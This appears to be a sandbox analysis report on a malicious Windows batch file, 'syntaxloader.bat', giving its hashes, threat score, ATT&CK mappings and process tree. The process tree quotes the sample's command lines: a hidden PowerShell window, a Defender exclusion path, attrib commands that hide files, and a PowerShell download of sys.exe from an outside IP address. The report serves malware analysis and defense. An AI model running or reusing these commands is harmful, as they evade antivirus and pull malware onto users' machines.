146ef38c311af5e1375df0f2ad2f34f691b1104c35e20a610a68eb8147db7e0b

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
08/11/2024, 21:39

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

syntaxloader.bat
Size

25KB
MD5

ea50d652e81767c52b0f8428ff1e25da
SHA1

430b12c8f82e58ec10a00426f506b9a0bd71489a
SHA256

146ef38c311af5e1375df0f2ad2f34f691b1104c35e20a610a68eb8147db7e0b
SHA512

60072e939c4b0b3296f699cfb9585444231fad591323c61d4fb9c41828ab41e4afb171cf036623a697ed73e9a0db68954c2f92bac032180b68ca8842390e909f
SSDEEP

384:7f07tvjFJnoSCZV5mbksKIyaxoxJy1KTb:j07tHoSCZqbhKIyPmKf

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2872	powershell.exe
1824	powershell.exe
2540	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1824	powershell.exe
2540	powershell.exe
2872	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1824	powershell.exe
Token: SeDebugPrivilege	2540	powershell.exe
Token: SeDebugPrivilege	2872	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2128 wrote to memory of 1824	2128	cmd.exe	31
PID 2128 wrote to memory of 1824	2128	cmd.exe	31
PID 2128 wrote to memory of 1824	2128	cmd.exe	31
PID 2128 wrote to memory of 2064	2128	cmd.exe	32
PID 2128 wrote to memory of 2064	2128	cmd.exe	32
PID 2128 wrote to memory of 2064	2128	cmd.exe	32
PID 2128 wrote to memory of 2540	2128	cmd.exe	33
PID 2128 wrote to memory of 2540	2128	cmd.exe	33
PID 2128 wrote to memory of 2540	2128	cmd.exe	33
PID 2128 wrote to memory of 2768	2128	cmd.exe	34
PID 2128 wrote to memory of 2768	2128	cmd.exe	34
PID 2128 wrote to memory of 2768	2128	cmd.exe	34
PID 2128 wrote to memory of 2872	2128	cmd.exe	35
PID 2128 wrote to memory of 2872	2128	cmd.exe	35
PID 2128 wrote to memory of 2872	2128	cmd.exe	35
PID 2128 wrote to memory of 2096	2128	cmd.exe	36
PID 2128 wrote to memory of 2096	2128	cmd.exe	36
PID 2128 wrote to memory of 2096	2128	cmd.exe	36

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2768	attrib.exe
2096	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\syntaxloader.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -window hidden -command ""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1824
- C:\Windows\system32\cacls.exe
  "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
  2⤵
  PID:2064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionPath "C:\
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2540
- C:\Windows\system32\attrib.exe
  attrib +h "Anon" /s /d
  2⤵
  - Views/modifies file attributes
  PID:2768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Invoke-Webrequest '45.95.214.119/sys.exe' -OutFile sys.exe"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2872
- C:\Windows\system32\attrib.exe
  attrib +h "C:\Users\Admin\AppData\Local\Anon\sys.exe" /s /d
  2⤵
  - Views/modifies file attributes
  PID:2096

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
fed7ed176fe36fac865d99dc63a0e391

SHA1
d62788e557b8c493b58507a1d6bafea7bdf05b7a

SHA256
33d4a554a1ac7e2a3cc79d1a034136d9437559646e05700e373d692763b86048

SHA512
c19b3e88b7a14d6d65a393b1d436c0518d38fa9e0f971b2e3f9081a76619aaa2c058011b407b6d78ff1778582c6d7edf64e5cb84864160677e4a7b8826f4ede9

Download Submit
memory/1824-4-0x000007FEF493E000-0x000007FEF493F000-memory.dmp

Filesize
4KB

Download
memory/1824-6-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/1824-5-0x000000001B6B0000-0x000000001B992000-memory.dmp

Filesize
2.9MB

Download
memory/1824-8-0x0000000002A5B000-0x0000000002AC2000-memory.dmp

Filesize
412KB

Download
memory/1824-7-0x0000000002A54000-0x0000000002A57000-memory.dmp

Filesize
12KB

Download
memory/1824-9-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

Filesize
9.6MB

Download
memory/2540-16-0x0000000002690000-0x0000000002698000-memory.dmp

Filesize
32KB

Download
memory/2540-15-0x000000001B650000-0x000000001B932000-memory.dmp

Filesize
2.9MB

Download